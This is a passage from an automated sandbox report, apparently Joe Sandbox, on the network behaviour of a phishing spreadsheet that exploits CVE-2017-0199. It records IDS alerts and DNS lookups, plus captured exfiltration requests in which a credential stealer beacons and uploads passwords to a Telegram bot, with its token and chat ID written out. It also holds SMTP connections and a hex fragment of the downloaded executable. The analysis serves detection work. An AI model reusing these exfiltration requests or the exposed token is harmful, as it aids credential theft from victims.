                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.3.176.138:80 -> 192.168.2.22:49165
                        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.176.138:80

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 192.3.176.138:80
                        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.176.138:80
                        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.176.138:80 -> 192.168.2.22:49162
                        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.176.138:80 -> 192.168.2.22:49164
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: unknownDNS query: name: api.telegram.org
                        Source: Yara matchFile source: 12.2.sihost.exe.441db80.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.sihost.exe.43da760.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx, type: SAMPLE
                        Source: global trafficTCP traffic: 192.168.2.22:49203 -> 208.91.199.225:587
                        Source: global trafficTCP traffic: 192.168.2.22:49205 -> 208.91.198.143:587
                        Source: global trafficTCP traffic: 192.168.2.22:49207 -> 208.91.199.224:587
                        Source: global trafficTCP traffic: 192.168.2.22:49211 -> 208.91.199.223:587
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 13 Aug 2024 18:24:37 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Tue, 13 Aug 2024 12:53:46 GMTETag: "c0000-61f9019a8bcbf"Accept-Ranges: bytesContent-Length: 786432Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fc 56 bb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 ec 0a 00 00 12 01 00 00 00 00 00 fe 0a 0b 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 0a 0b 00 53 00 00 00 00 20 0b 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 eb 0a 00 00 20 00 00 00 ec 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 10 01 00 00 20 0b 00 00 10 01 00 00 ee 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0c 00 00 02 00 00 00 fe 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0a 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 b4 dd 0a 00 f4 2c 00 00 03 00 00 00 18 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 03 00 41 00 00 00 00 00 00 00 20 50 01 00 00 8d 01 00 00 01 25 d0 17 00 00 04 28 01 00 00 0a 80 18 00 00 04 20 42 01 00 00 8d 05 00 00 01 25 d0 31 00 00 04 28 01 00 00 0a 80 32 00 00 04 28 08 00 00 06 2a d0 01 00 00 06 26 2a 00 00 00 1a 7e 01 00 00 04 2a 00 1e 02 80 01 00 00 04 2a 1a 7e 02 00 00 04 2a 00 1e 02 80 02 00 00 04 2a 22 02 28 05 00 00 0a 00 2a 00 00 00 13 30 03 00 7b 00 00 00 01 00 00 11 1e 8d 05 00 00 01 25 d0 07 00 00 04 28 01 00 00 0a 80 05 00 00 04 1e 8d 05 00 00 01 0a 06 19 20 1c 0f 00 00 9d 06 1d 20 63 2c 00 00 9d 06 18 20 03 3a 00 00 9d 06 16 20 de 36 00 00 9d 06 1a 20 35 09 00 00 9d 06 17 20 d5 36 00 00 9d 06 1c 20 fe 20 00 00 9d 06 1b 20 1c 0e 00 00 9d 17 8d 0b 00 00 01 80 06 00 00 04 06 80 04 00 00 04 28 08 00 00 06 2a d0 07 00 00 06 26 2a 00 1b 30 03 00 0c 01 00 00 02 00 00 11 7e 32 00 00 04 13 06 7e 18 00 00 04 0d 16 0c 08 45 05 00 00 00 00 00 00 00 14 00
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%208/14/2024%20/%207:15:53%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:888683%0D%0ADate%20and%20Time:%208/15/2024%20/%207:26:06%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20888683%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbd929eb213d3Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbd9b00a4d486Host: api.telegram.orgContent-Length: 560
                        Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbdfb6c102920Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbdac5db5126dHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbe0c6bb89c78Host: api.telegram.orgContent-Length: 560
                        Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbe27325b2ebcHost: api.telegram.orgContent-Length: 560
                        Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbdc0151008beHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbddc7e4bd5e0Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbe40cf9a0238Host: api.telegram.orgContent-Length: 560
                        Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbe5b5aaec62eHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbe7ce2b69c01Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcbe9bda6024fbHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
                        Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                        Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                        Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                        Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\sihost.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: reallyfreegeoip.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: checkip.dyndns.org
                        Source: C:\Users\user\AppData\Roaming\bKVNuVuE.exeDNS query: name: reallyfreegeoip.org
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49169 -> 193.122.130.0:80
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49173 -> 158.101.44.242:80
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49183 -> 132.226.8.169:80
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49175 -> 193.122.6.168:80
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49166 -> 158.101.44.242:80
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49181 -> 132.226.8.169:80
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49185 -> 193.122.6.168:80
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49178 -> 158.101.44.242:80
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49194 -> 193.122.6.168:80
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49177 -> 132.226.247.73:80
                        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49171 -> 193.122.130.0:80
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49184 -> 188.114.97.3:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49198 -> 188.114.97.3:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49188 -> 188.114.96.3:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49168 -> 188.114.96.3:443
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49182 -> 188.114.97.3:443
                        Source: global trafficTCP traffic: 192.168.2.22:49203 -> 208.91.199.225:587
                        Source: global trafficTCP traffic: 192.168.2.22:49205 -> 208.91.198.143:587
                        Source: global trafficTCP traffic: 192.168.2.22:49207 -> 208.91.199.224:587
                        Source: global trafficTCP traffic: 192.168.2.22:49211 -> 208.91.199.223:587
                        Source: global trafficHTTP traffic detected: GET /JkAPbL HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: exi.linkConnection: Keep-Alive
